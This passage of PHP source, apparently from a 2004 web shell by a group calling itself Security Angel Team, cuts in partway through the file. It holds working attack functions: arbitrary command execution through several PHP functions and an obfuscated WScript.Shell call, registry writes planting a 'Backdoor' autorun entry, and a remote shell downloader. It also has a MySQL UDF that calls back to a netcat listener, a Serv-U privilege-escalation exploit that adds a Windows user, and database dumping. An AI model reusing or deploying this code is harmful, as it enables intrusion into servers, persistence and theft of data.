  $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open');
  $tb->tdbody('朞嶝獵契변鑒: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 渴흙츱즈: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
  <tr class="secondalt">
    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
    if (!empty($_POST['command'])) {
        if ($execfunc=="system") {
            system($_POST['command']);
        } elseif ($execfunc=="passthru") {
            passthru($_POST['command']);
        } elseif ($execfunc=="exec") {
            $result = exec($_POST['command']);
            echo $result;
        } elseif ($execfunc=="shell_exec") {
            $result=shell_exec($_POST['command']);
            echo $result;    
        } elseif ($execfunc=="popen") {
            $pp = popen($_POST['command'], 'r');
            $read = fread($pp, 2096);
            echo $read;
            pclose($pp);
        } elseif ($execfunc=="wscript") {
            $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
            $stdout = $exec->StdOut();
            $stroutput = $stdout->ReadAll();
            echo $stroutput;
        } elseif($execfunc=="proc_open"){
$descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
);
$process = proc_open("".$_POST['cmd']."", $descriptorspec, $pipes);
if (is_resource($process)) {

    // 畇츱즈
    fwrite($pipes[0], "".$_POST['command']."\r\n");
    fwrite($pipes[0], "exit\r\n");
    fclose($pipes[0]);
    // 뗍혤渴놔
    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    while (!feof($pipes[2])) {
        echo fgets($pipes[2], 1024);
      }
    fclose($pipes[2]);

    proc_close($process);
}
        } else {
            system($_POST['command']);
        }
    }
    ?></textarea></td>
  </tr> 
  </form>
</table>
<?php
}//end shell

elseif ($_GET['action'] == "reg") {
    $action = '?action=reg';
    $regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
    $registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
    $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
    $delregname = $_POST['delregname'];
    $tb->tableheader();
    $tb->formheader($action,'뗍혤鬧꿍깊');
    $tb->tdbody('숩令: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','뗍혤','','submit'),'center','2','50');
    echo "</form>";

    $tb->formheader($action,'畇흙鬧꿍깊');
    $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
    $tb->tdbody('숩令: '.$tb->makeinput('writeregname',$registre,'','text','56').' 잚謹: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 令:  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','畇흙','','submit'),'center','2','50');
    echo "</form>";

    $tb->formheader($action,'뇜鬧꿍깊');
    $tb->tdbody('숩令: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','뇜','','submit'),'center','2','50');
    echo "</form>";
    $tb->tablefooter();
}//end reg
elseif ($_GET['action'] == "downloads"){
$action = '?action=dir';
    $tb->tableheader();
    $tb->formheader($action,'http匡숭苟潼친駕');
    $tb->tdbody('콱옵鹿賈痰굶묘콘겉寧硅鬼묏야鹿http렘駕苟潼돕늪륩蛟포','center');
    $tb->tdbody('匡숭貫零: '.$tb->makeinput('durl','http://blog.blackwoods.com/miyabi/myshell.txt','','text','70').'<br>苟潼돕:'.$tb->makeinput('path','./myshell.php','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','苟潼','','submit'),'center','1','35');
    echo "</form>";
    $tb->tdbody('鬧雷,솝匡숭格댕쉥轟랬苟潼苟윱랍할緞捲獵契醵똑.','center');
    $tb->tablefooter();
}
elseif ($_GET['action'] == "search"){
$action = '?dir='.$dir.'';
    $tb->tableheader();
    $tb->formheader($action,'匡숭꿴冷');
    $tb->tdbody('콱옵鹿賈痰굶묘콘꿴冷寧몸커쩌苟돨匡숭쟁컴畇匡숭관벵淪밑숩늦!','center');
    $tb->tdbody('匡숭貫零: '.$tb->makeinput('path',''.$nowpath.'','','text','70').'<br>꿴冷匡俚:'.$tb->makeinput('oldkey','苟술','','text','60').''.$tb->makehidden('do','search').'<br> 角뤠셕炬杰瞳契<input type="checkbox" name="type" value="list" ="javascript:alert(\'朞땍늪뇹쉥삔죗놔밑숩늦瞳杰瞳匡숭돨뜩契,뵨杰瞳돨컸匡숭唐뜩契쏵契궐뚤\\n\\n목駕槨:[杰瞳契/匡숭悧契]절흔[12/99],痰윱쏵契롸驕.\\n\\n늪묘콘옵콘삔藤속寧꼬롸돨儺珂,헝옘쪄賈痰,청唐옵뗍홈掘쉥놔댄!\')"> (늪묘콘뵨苟충寧몸묘콘삔緞捲獵契醵똑,杰鹿칵훰밑균!) <br>刊뎠뗍혤:<input type="checkbox" name="type2" value="getpath" ="javascript:alert(\'朞땍늪뇹쉥삔죗놔밑숩늦瞳杰瞳貫零섟콱땍써監혐堵코돨꼬롸俚륜..\\n\\n꽃혤늪묘콘꿴冷供匡숭빈겉柑깃盧땡돕冷돕돨匡숭츰섦옵뗍혤롸驕....\\n\\n늪묘콘옵콘삔藤속寧꼬롸돨儺珂,헝옘쪄賈痰,청唐옵뗍홈掘쉥놔댄!\')"> 뗍혤밑숩늦품'.$tb->makeinput('beline','0','','text','3').'몸俚륜 '.$tb->makehidden('dir',''.$dir.'').'돕밑숩늦빈뒤'.$tb->makeinput('endline','10','','text','3').'몸俚륜... '.$tb->makehidden('dir',''.$dir.'').''.$tb->makeinput('','역迦꿴冷匡숭','','submit'),'center','1','35');
    echo "</form>";
    $tb->tdbody('헝깊格댕돨커쩌죄,찹찹啞응찹찹冷봤꼇봤찍.솝朞땍셕炬契醵똑삔찹。鞫刻[杰瞳契/悧묾뜩契]','center');
    $tb->tablefooter();
}
elseif ($_GET['action'] == "proxy") {
    $action = '?action=proxy';
    $tb->tableheader();
    $tb->formheader($action,'瞳窟덜잿','proxyframe');
    $tb->tdbody('<br><ul><li>痰굶묘콘쏭茄君숌데돨 HTTP 덜잿,꼇삔鞫刻賈痰宮뚤쨌쓺돨暠튬、졍쌈섟CSS湳駕깊.</li><li>痰굶묘콘옵鹿繫법굶륩蛟포啞응커깃URL,뎃꼇連넣 SQL Injection 決꿎鹿섟캐硅景喝俚륜.</li><li>痰굶묘콘啞응돨 URL,瞳커깃寮샙즛苟돨IP션쩌角 : '.gethostbyname($_SERVER['SERVER_NAME']).'</li></ul>','left');
    $tb->tdbody('URL: '.$tb->makeinput('url','http://1v1.name','','text','100').' '.$tb->makeinput('','啞응','','submit'),'center','1','40');
    $tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://1v1.name"></iframe>');
    echo "</form>";
    $tb->tablefooter();
}//end proxy

elseif ($_GET['action'] == "sql") {
    $action = '?action=sql';

    $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
    $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
    $dbpassword = $_POST['dbpassword'];
    $dbname = $_POST['dbname'];
    $sql_query = $_POST['sql_query'];
if($type=="fun"){
$sql_query = "CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\\Winnt\\\Mix.dll';
select Mixconnect('".$_SERVER['REMOTE_ADDR']."','8888');/*侶몸離봤邱獵契죄충寧얌疼痰*/
/*헝瞳콱셕炬샙獵契 nc -vv -l -p 8888*/";
}
    $tb->tableheader();
    $tb->formheader($action,'獵契 SQL 刀얌');
    $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','젯쌈','','submit'));
    $tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
    $tb->makehidden('do','query');
    $tb->formfooter('1','30');
}//end sql query

elseif ($_GET['action'] == "sqlbak") {
    $action = '?action=sqlbak';
    $servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
    $dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
    $dbpassword = $_POST['dbpassword'];
    $dbname = $_POST['dbname'];
    $tb->tableheader();
    $tb->formheader($action,'구룀 MySQL 鑒앴욋');
    $tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','젯쌈','','submit'));
    @mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
    $tables = @mysql_list_tables($dbname);
    while ($table = @mysql_fetch_row($tables)) {
        $cachetables[$table[0]] = $table[0];
    }
    @mysql_free_result($tables);
    if (empty($cachetables)) {
        $tb->tdbody('<b>퀭청唐젯쌈鑒앴욋 or 뎠품鑒앴욋청唐훨부鑒앴깊</b>');
    } else {
        $tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">헝朞嶝깊:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> 구룀鑒앴杰괏닸돨쨌쓺:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> 殮쌈苟潼돕굶뒈 (刊북鑒앴좆싹鬼돨鑒앴욋)</td></tr></table>');
        $tb->makehidden('do','backupmysql');
        $tb->formfooter('0','30');
    }
    $tb->tablefooter();
    @mysql_close();
}//end sql backup

elseif ($_GET['action'] == "phpenv") {
    $user = " <a href=\"?action=nowuser\" target=\"_blank\">鹿출crush듐늪삿혤뎠품쏵넋痰빵츰</a> ";
    $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "꼇豚冀눈";
    $adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
    if ($dis_func == "") {
        $dis_func = "No";
    }else {
        $dis_func = str_replace(" ","<br>",$dis_func);
        $dis_func = str_replace(",","<br>",$dis_func);
    }
    $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
        $info = array(
            0 => array("뎠품php쏵넋痰빵",$user),
            1 => array("륩蛟포꾸鱗溝固",PHP_OS),
            2 => array("륩蛟포珂쇌",date("Y쾨m墩d휑 h:i:s",time())),
            3 => array("륩蛟포堵츰","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
            4 => array("륩蛟포IP뒈囹",gethostbyname($_SERVER['SERVER_NAME'])),
            5 => array("륩蛟포꾸鱗溝固匡俚긍쯤",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
            6 => array("륩蛟포썩陋多헐",$_SERVER['SERVER_SOFTWARE']),
            7 => array("Web륩蛟똥왯",$_SERVER['SERVER_PORT']),
            8 => array("PHP頓契렘駕",strtoupper(php_sapi_name())),
            9 => array("PHP경굶",PHP_VERSION),
            10 => array("頓契黨갛홍친駕",getphpcfg("safemode")),
            11 => array("륩蛟포밗잿逃",$adminmail),
            12 => array("굶匡숭쨌쓺",__FILE__),
            13 => array("豚冀賈痰 URL 댔역匡숭 allow_url_fopen",getphpcfg("allow_url_fopen")),
            14 => array("豚冀땡檄속潼졍쌈욋 enable_dl",getphpcfg("enable_dl")),
            15 => array("鞫刻댄轎斤口 display_errors",getphpcfg("display_errors")),
            16 => array("菱땡땍屢홍애긴좆 register_globals",getphpcfg("register_globals")),
            17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
            18 => array("넋埼離뜩豚冀賈痰코닸좆 memory_limit",getphpcfg("memory_limit")),
            19 => array("POST離댕俚쌘鑒 post_max_size",getphpcfg("post_max_size")),
            20 => array("豚冀離댕눈匡숭 upload_max_filesize",$upsize),
            21 => array("넋埼離낀頓契珂쇌 max_execution_time",getphpcfg("max_execution_time")."취"),
            22 => array("굳쐐痰돨변鑒 disable_functions",$dis_func),
            23 => array("phpinfo()",$phpinfo),
            24 => array("커품뻘唐왕岱왕쇌diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
            25 => array("暠近뇹잿 GD Library",getfun("imageline")),
            26 => array("IMAP든綾錟숭溝固",getfun("imap_close")),
            27 => array("MySQL鑒앴욋",getfun("mysql_close")),
            28 => array("SyBase鑒앴욋",getfun("sybase_close")),
            29 => array("Oracle鑒앴욋",getfun("ora_close")),
            30 => array("Oracle 8 鑒앴욋",getfun("OCILogOff")),
            31 => array("PREL宮휭刀랬 PCRE",getfun("preg_match")),
            32 => array("PDF匡도連넣",getfun("pdf_close")),
            33 => array("Postgre SQL鑒앴욋",getfun("pg_close")),
            34 => array("SNMP貢쭹밗잿葵累",getfun("snmpget")),
            35 => array("箕鍵匡숭連넣(Zlib)",getfun("gzclose")),
            36 => array("XML썩驕",getfun("xml_set_object")),
            37 => array("FTP",getfun("ftp_login")),
            38 => array("ODBC鑒앴욋젯쌈",getfun("odbc_close")),
            39 => array("Session連넣",getfun("session_start")),
            40 => array("Socket連넣",getfun("fsockopen")),
        );
    $tb->tableheader();
    echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
    $tb->tdbody('<b>꿴였PHP토零꽝鑒榴워</b>','left','1','30','style="padding-left: 5px;"');
    $tb->tdbody('헝渴흙토零꽝鑒(흔:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','꿴였','','submit'),'left','2','30','style="padding-left: 5px;"');
    $tb->makehidden('do','viewphpvar');
    echo "</form>\n";
    $hp = array(0=> '륩蛟포景昑', 1=> 'PHP샘굶景昑', 2=> '莉숭連넣榴워');
    for ($a=0;$a<3;$a++) {
        $tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
  <tr class="secondalt">
    <td>
      <table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
        if ($a==0) {
            for($i=0;$i<=12;$i++) {
                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
            }
        } elseif ($a == 1) {
            for ($i=13;$i<=24;$i++) {
                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
            }
        } elseif ($a == 2) {
            for ($i=25;$i<=40;$i++) {
                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
            }
        }
?>
      </table>
    </td>
  </tr>
<?php
    }//for
echo "</table>";
}//end phpenv
elseif($_GET['action'] == "SUExp")
{
    if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "" && $_POST['SUCommand'])
    {
        echo "<table width=\"760\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\"><tr class=\"firstalt\"><td align=\"left\">";
        $sendbuf = "";
        $recvbuf = "";
        $domain  = "-SETDOMAIN\r\n".
                "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
                "-TZOEnable=0\r\n".
                " TZOKey=\r\n";
        $adduser = "-SETUSERSETUP\r\n".
                "-IP=0.0.0.0\r\n".
                "-PortNo=2121\r\n".
                "-User=Will_Be\r\n".
                "-Password=Will_Be\r\n".
                "-HomeDir=c:\\\r\n".
                "-LoginMesFile=\r\n".
                "-Disable=0\r\n".
                "-RelPaths=1\r\n".
                "-NeedSecure=0\r\n".
                "-HideHidden=0\r\n".
                "-AlwaysAllowLogin=0\r\n".
                "-ChangePassword=0\r\n".
                "-QuotaEnable=0\r\n".
                "-MaxUsersLoginPerIP=-1\r\n".
                "-SpeedLimitUp=0\r\n".
                "-SpeedLimitDown=0\r\n".
                "-MaxNrUsers=-1\r\n".
                "-IdleTimeOut=600\r\n".
                "-SessionTimeOut=-1\r\n".
                "-Expire=0\r\n".
                "-RatioUp=1\r\n".
                "-RatioDown=1\r\n".
                "-RatiosCredit=0\r\n".
                "-QuotaCurrent=0\r\n".
                "-QuotaMaximum=0\r\n".
                "-Maintenance=None\r\n".
                "-PasswordType=Regular\r\n".
                "-Ratios=None\r\n".
                " Access=c:\\|RELP\r\n";
        $deldomain="-DELETEDOMAIN\r\n".
                    "-IP=0.0.0.0\r\n".
                    " PortNo=2121\r\n";
        $sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "USER ".$_POST["SUUser"]."\r\n";
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "SITE MAINTENANCE\r\n";
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = $domain;
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = $adduser;
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        echo "**********************************************************<br>";
        echo "Starting Exploit ...<br>";
        echo "**********************************************************<br>";
        $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
        $recvbuf = fgets($exp, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "USER Will_Be\r\n";
        fputs($exp, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($exp, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "PASS Will_Be\r\n";
        fputs($exp, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($exp, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
        fputs($exp, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["SUCommand"]."</font><br>";
        $recvbuf = fgets($exp, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        echo "**********************************************************<br>";
        echo "Starting Delete Domain ...<br>";
        echo "**********************************************************<br>";
        $sendbuf = $deldomain;
        fputs($sock, $sendbuf, strlen($sendbuf));
        echo "<font color=blue>Send: $sendbuf</font><br>";
        $recvbuf = fgets($sock, 1024);
        echo "<font color=red>Recv: $recvbuf</font><br>";
        echo "</td></tr></table>";
        fclose($sock);
        fclose($exp);
    }
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  <tr class="firstalt">
    <td align="center">繫법Serv-U 굶뒈밗잿逃琅뵀獵契츱즈</td>
  </tr>
  <form action="?action=SUExp" method="POST">
  <tr class="secondalt">
    <td align="center">LocalPort:
      <input name="SUPort" type="text" class="INPUT" id="SUPort" value="43958" size="7">       
      LocalUser:
      <input name="SUUser" type="text" class="INPUT" id="SUUser" value="LocalAdministrator">       LocalPass:
      <input name="SUPass" type="text" class="INPUT" id="SUPass" value="#l@$ak#.lk;0@P">
      <br>
      Command :
      <input name="SUCommand" type="text" class="INPUT" id="SUCommand" value="net user Will_Be heihei /add" size="50"></td>
  </tr>
  <tr class="secondalt">
    <td align="center"><input name="Submit" type="submit" class="input" id="Submit" value="獵契"> 
      <input name="Submit" type="reset" class="INPUT" value="路零"></td>
  </tr> 
  </form>
</table>
<?php
}
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
  <tr>
    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
    <td align="right"><?php
    debuginfo();
    ob_end_flush();    
    ?></td>
  </tr>
</table>
</center>
</body>
</html>

<?php

/*======================================================
변鑒욋
======================================================*/

    // 되쩍흙왯
    function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<table width="416" border="0" align="center" cellpadding="0" cellspacing="0">
<form method="POST" action="">
  <tr>
    <td height="75" align="center">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
    </td>
  </tr>
  </form>
  <SCRIPT type='text/javascript' language='javascript' src='http://xslt.alexa.com/site_stats/js/t/c?url=<? echo $_SERVER['HTTP_HOST'];?>'></SCRIPT>
  </table>

<?php
        exit;
    }//end loginpage()

    // 女충딧桿斤口
    function debuginfo() {
        global $starttime;
        $mtime = explode(' ', microtime());
        $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
        echo "Processed in $totaltime second(s)";
    }

    // 혼딜瘻屢俚륜
    function stripslashes_array(&$array) {
        while(list($key,$var) = each($array)) {
            if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
                if (is_string($var)) {
                    $array[$key] = stripslashes($var);
                }
                if (is_array($var))  {
                    $array[$key] = stripslashes_array($var);
                }
            }
        }
        return $array;
    }

    // 뇜커쩌
    function deltree($deldir) {
        $mydir=@dir($deldir);    
        while($file=$mydir->read())    {         
            if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
                @chmod("$deldir/$file",0777);
                deltree("$deldir/$file");
            }
            if (is_file("$deldir/$file")) {
                @chmod("$deldir/$file",0777);
                @unlink("$deldir/$file");
            }
        }
        $mydir->close();
        @chmod("$deldir",0777);
        return (@rmdir($deldir)) ? 1 : 0;
    }

    // 털뙤뗍畇헙워
    function dir_writeable($dir) {
        if (!is_dir($dir)) {
            @mkdir($dir, 0777);
        }
        if(is_dir($dir)) {
            if ($fp = @fopen("$dir/test.txt", 'w')) {
                @fclose($fp);
                @unlink("$dir/test.txt");
                $writeable = 1;
            } else {
                $writeable = 0;
            }
        }
        return $writeable;
    }

    // 깊목契쇌돨교쒼競뻣
    function getrowbg() {
        global $bgcounter;
        if ($bgcounter++%2==0) {
            return "firstalt";
        } else {
            return "secondalt";
        }
    }

// 삿혤뎠품돨匡숭溝固쨌쓺
    function getPath($mainpath, $relativepath) {
        global $dir;
        $mainpath_info          = explode('/', $mainpath);
        $relativepath_info      = explode('/', $relativepath);
        $relativepath_info_count = count($relativepath_info);
        for ($i=0; $i<$relativepath_info_count; $i++) {
            if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
            if ($relativepath_info[$i] == '..') {
                $mainpath_info_count = count($mainpath_info);
                unset($mainpath_info[$mainpath_info_count-1]);
                continue;
            }
            $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
        } //end for
        return implode('/', $mainpath_info);
    }

    // 쇱꿴PHP토零꽝鑒
    function getphpcfg($varname) {
        switch($result = get_cfg_var($varname)) {
            case 0:
            return "No";
            break;
            case 1:
            return "Yes";
            break;
            default:
            return $result;
            break;
        }
    }

 // 쇱꿴변鑒헙워
    function getfun($funName) {
        return (false !== function_exists($funName)) ? "Yes" : "No";
    }

    // 箕鍵댔관잚
    class PHPZip{
    var $out='';
        function PHPZip($dir)    {
            if (@function_exists('gzcompress'))    {
                $curdir = getcwd();
                if (is_array($dir)) $filelist = $dir;
                else{
                    $filelist=$this -> GetFileList($dir);//匡숭죗깊
                    foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
                }
                if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
                else chdir($curdir);
                if (count($filelist)>0){
                    foreach($filelist as $filename){
                        if (is_file($filename)){
                            $fd = fopen ($filename, "r");
                            $content = @fread ($fd, filesize ($filename));
                            fclose ($fd);
                            if (is_array($dir)) $filename = basename($filename);
                            $this -> addFile($content, $filename);
                        }
                    }
                    $this->out = $this -> file();
                    chdir($curdir);
                }
                return 1;
            }
            else return 0;
        }

        // 삿돤寧땍커쩌匡숭죗깊
        function GetFileList($dir){
            static $a;
            if (is_dir($dir)) {
                if ($dh = opendir($dir)) {
                      while (($file = readdir($dh)) !== false) {
                        if($file!='.' && $file!='..'){
                            $f=$dir .'/'. $file;
                            if(is_dir($f)) $this->GetFileList($f);
                            $a[]=$f;
                        }
                    }
                    closedir($dh);
                }
            }
            return $a;
        }

        var $datasec      = array();
        var $ctrl_dir    = array();
        var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
        var $old_offset  = 0;

        function unix2DosTime($unixtime = 0) {
            $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
            if ($timearray['year'] < 1980) {
                $timearray['year']    = 1980;
                $timearray['mon']    = 1;
                $timearray['mday']    = 1;
                $timearray['hours']  = 0;
                $timearray['minutes'] = 0;
                $timearray['seconds'] = 0;
            } // end if
            return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
                    ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
        }

        function addFile($data, $name, $time = 0) {
            $name    = str_replace('\\', '/', $name);

            $dtime    = dechex($this->unix2DosTime($time));
            $hexdtime = '\x' . $dtime[6] . $dtime[7]
                      . '\x' . $dtime[4] . $dtime[5]
                      . '\x' . $dtime[2] . $dtime[3]
                      . '\x' . $dtime[0] . $dtime[1];
            eval('$hexdtime = "' . $hexdtime . '";');
            $fr  = "\x50\x4b\x03\x04";
            $fr  .= "\x14\x00";
            $fr  .= "\x00\x00";
            $fr  .= "\x08\x00";
            $fr  .= $hexdtime;

            $unc_len = strlen($data);
            $crc    = crc32($data);
            $zdata  = gzcompress($data);
            $c_len  = strlen($zdata);
            $zdata  = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
            $fr      .= pack('V', $crc);
            $fr      .= pack('V', $c_len);
            $fr      .= pack('V', $unc_len);
            $fr      .= pack('v', strlen($name));
            $fr      .= pack('v', 0);
            $fr      .= $name;

            $fr .= $zdata;

            $fr .= pack('V', $crc);
            $fr .= pack('V', $c_len);
            $fr .= pack('V', $unc_len);

            $this -> datasec[] = $fr;
            $new_offset        = strlen(implode('', $this->datasec));

            $cdrec = "\x50\x4b\x01\x02";
            $cdrec .= "\x00\x00";
            $cdrec .= "\x14\x00";
            $cdrec .= "\x00\x00";
            $cdrec .= "\x08\x00";
            $cdrec .= $hexdtime;
            $cdrec .= pack('V', $crc);
            $cdrec .= pack('V', $c_len);
            $cdrec .= pack('V', $unc_len);
            $cdrec .= pack('v', strlen($name) );
            $cdrec .= pack('v', 0 );
            $cdrec .= pack('v', 0 );
            $cdrec .= pack('v', 0 );
            $cdrec .= pack('v', 0 );
            $cdrec .= pack('V', 32 );
            $cdrec .= pack('V', $this -> old_offset );
            $this -> old_offset = $new_offset;
            $cdrec .= $name;

            $this -> ctrl_dir[] = $cdrec;
        }

        function file() {
            $data    = implode('', $this -> datasec);
            $ctrldir = implode('', $this -> ctrl_dir);
            return
                $data .
                $ctrldir .
                $this -> eof_ctrl_dir .
                pack('v', sizeof($this -> ctrl_dir)) .
                pack('v', sizeof($this -> ctrl_dir)) .
                pack('V', strlen($ctrldir)) .
                pack('V', strlen($data)) .
                "\x00\x00";
        }
    }

    // 구룀鑒앴욋
    function sqldumptable($table, $fp=0) {
        $tabledump = "DROP TABLE IF EXISTS $table;\n";
        $tabledump .= "CREATE TABLE $table (\n";

        $firstfield=1;

        $fields = mysql_query("SHOW FIELDS FROM $table");
        while ($field = mysql_fetch_array($fields)) {
            if (!$firstfield) {
                $tabledump .= ",\n";
            } else {
                $firstfield=0;
            }
            $tabledump .= "  $field[Field] $field[Type]";
            if (!empty($field["Default"])) {
                $tabledump .= " DEFAULT '$field[Default]'";
            }
            if ($field['Null'] != "YES") {
                $tabledump .= " NOT NULL";
            }
